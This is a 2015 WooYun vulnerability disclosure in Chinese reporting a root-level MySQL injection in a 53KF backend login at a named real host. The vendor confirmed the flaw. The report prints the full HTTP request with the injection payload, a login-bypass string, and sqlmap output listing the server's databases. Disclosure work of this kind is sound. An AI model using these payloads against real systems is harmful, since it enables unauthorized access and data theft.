当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115017

漏洞标题:53KF某后台MySQL盲注(root)

相关厂商:53KF企业在线平台

漏洞作者: 路人甲

提交时间:2015-05-19 21:29

修复时间:2015-07-03 22:22

公开时间:2015-07-03 22:22

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-19: 细节已通知厂商并且等待厂商处理中
2015-05-19: 厂商已经确认,细节仅向厂商公开
2015-05-29: 细节向核心白帽子及相关领域专家公开
2015-06-08: 细节向普通白帽子公开
2015-06-18: 细节向实习白帽子公开
2015-07-03: 细节向公众公开

简要描述:

53KF某后台MySQL盲注(root)

详细说明:

注射点:

POST /check.php HTTP/1.1
Content-Length: 166
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://hlm.53kf.com
Host: hlm.53kf.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko)
Version/8.0 Mobile/12A4345d Safari/600.1.4
Accept: */*
Submit=&action=login&name=admin' or 1=1* or '1aa'='1&pwd=test


name可注入,本身是很简单的注入,SQLmap设定--risk=3竟然跑不出来。于是构造了下参数让注入更明显一点:

admin' or 1=1* or '1aa'='1

漏洞证明:

用户名输入: admin' or 1=1 or '1'='--
可以直接登陆后台:

53kf.png


让SQLmap跑一下:

current user:    'root@localhost'
current database: 'hlm'
available databases [53]:
[*] `13jian`
[*] bak
[*] entalk
[*] hk_kf
[*] hk_kf1
[*] hk_talk
[*] hlm
[*] income
[*] information_schema
[*] ip
[*] ip2
[*] ip_110711
[*] ip_src
[*] kf
[*] kf1
[*] mysql
[*] oem
[*] oem_168kf_kf
[*] oem_168kf_kf1
[*] oem_168kf_talk
[*] oem_del
[*] oem_ekt_kf
[*] oem_ekt_kf1
[*] oem_ekt_talk
[*] oem_old
[*] oem_test
[*] oem_tzchat_kf
[*] oem_tzchat_kf1
[*] oem_tzchat_kf1_new
[*] oem_tzchat_kf_new
[*] oem_tzchat_talk
[*] oem_tzchat_talk_new
[*] oem_wb_kf
[*] oem_wb_kf1
[*] oem_wb_talk
[*] oem_yitian_kf
[*] oem_yitian_kf1
[*] oem_yitian_kf1_new
[*] oem_yitian_kf_new
[*] oem_yitian_talk
[*] oem_yitian_talk_new
[*] oem_ywdj_kf
[*] oem_ywdj_kf1
[*] oem_ywdj_talk
[*] srv_kf
[*] srv_kf1
[*] srv_talk
[*] stat
[*] talk
[*] test
[*] tw
[*] tw1
[*] twtalk

修复方案:

参数过滤下

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-05-19 22:20

厂商回复:

感谢您对问题的反馈,我们将紧急对问题进行处理。谢谢!

最新状态:

暂无


漏洞评价:

评论